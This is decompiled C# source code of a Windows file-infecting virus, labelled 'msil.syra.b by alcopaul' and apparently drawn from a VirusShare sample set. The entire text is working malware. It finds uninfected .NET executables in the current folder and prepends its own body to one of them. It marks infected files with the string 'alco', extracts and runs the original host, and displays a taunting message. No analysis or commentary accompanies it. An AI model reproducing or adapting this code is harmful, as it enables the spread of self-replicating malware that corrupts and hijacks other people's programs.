// Decompiled with JetBrains decompiler // Type: msil_syra_by_alcopaul // Assembly: syra.b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 9CFE773D-27F0-436F-8F51-313FF31C4F0C // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9.exe using System.IO; using System.Reflection; using System.Runtime.InteropServices; internal class msil_syra_by_alcopaul { public static void Main(string[] args) { Module module = Assembly.GetExecutingAssembly().GetModules()[0]; foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe")) { try { AssemblyName.GetAssemblyName(file); FileStream fileStream = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Read); StreamReader streamReader = new StreamReader((Stream) fileStream); int offset = (int) fileStream.Length - 4; streamReader.BaseStream.Seek((long) offset, SeekOrigin.Begin); string str1 = streamReader.ReadLine(); streamReader.Close(); string str2 = "alco"; if (!(str1 == str2)) { if (!(file == module.FullyQualifiedName)) { try { msil_syra_by_alcopaul.Infect(file); break; } catch { } } } } catch { } } FileStream input = new FileStream(module.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read); BinaryReader binaryReader = new BinaryReader((Stream) input); int length = (int) input.Length - 5120; binaryReader.BaseStream.Seek(5120L, SeekOrigin.Begin); byte[] buffer = new byte[(int) checked ((uint) length)]; int count = length; int index = 0; int num; for (; count > 0; count -= num) { num = binaryReader.Read(buffer, index, count); if (num != 0) index += num; else break; } binaryReader.Close(); BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream("_U-.exe", FileMode.OpenOrCreate, FileAccess.Write)); binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin); binaryWriter.Write(buffer); binaryWriter.Close(); msil_syra_by_alcopaul.Win32.ShellExecute(0, (string) null, "_U-.exe", (string) null, Directory.GetCurrentDirectory(), 1); do { try { File.Delete("_U-.exe"); } catch { } } while (File.Exists("_U-.exe")); msil_syra_by_alcopaul.Win32.MessageBox(0, "::: now infecting dotnet files only :P :::", "msil.syra.b by alcopaul", 0U); } public static void Infect(string host) { BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read)); binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin); byte[] buffer1 = new byte[5120]; int count = 5120; int index1 = 0; int num1; for (; count > 0; count -= num1) { num1 = binaryReader1.Read(buffer1, index1, count); if (num1 != 0) index1 += num1; else break; } binaryReader1.Close(); FileStream input = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read); BinaryReader binaryReader2 = new BinaryReader((Stream) input); binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin); byte[] buffer2 = new byte[(int) checked ((uint) input.Length)]; int length = (int) input.Length; int index2 = 0; int num2; for (; length > 0; length -= num2) { num2 = binaryReader2.Read(buffer2, index2, length); if (num2 != 0) index2 += num2; else break; } binaryReader2.Close(); BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write)); binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin); binaryWriter.Write(buffer1); binaryWriter.Write(buffer2); binaryWriter.Write("alco"); binaryWriter.Close(); } public class Win32 { [DllImport("shell32.dll", CharSet = CharSet.Auto)] public static extern int ShellExecute( int hWnd, string oper, string file, string param, string dir, int type); [DllImport("user32.dll", CharSet = CharSet.Auto)] public static extern int MessageBox(int hWnd, string text, string caption, uint type); } }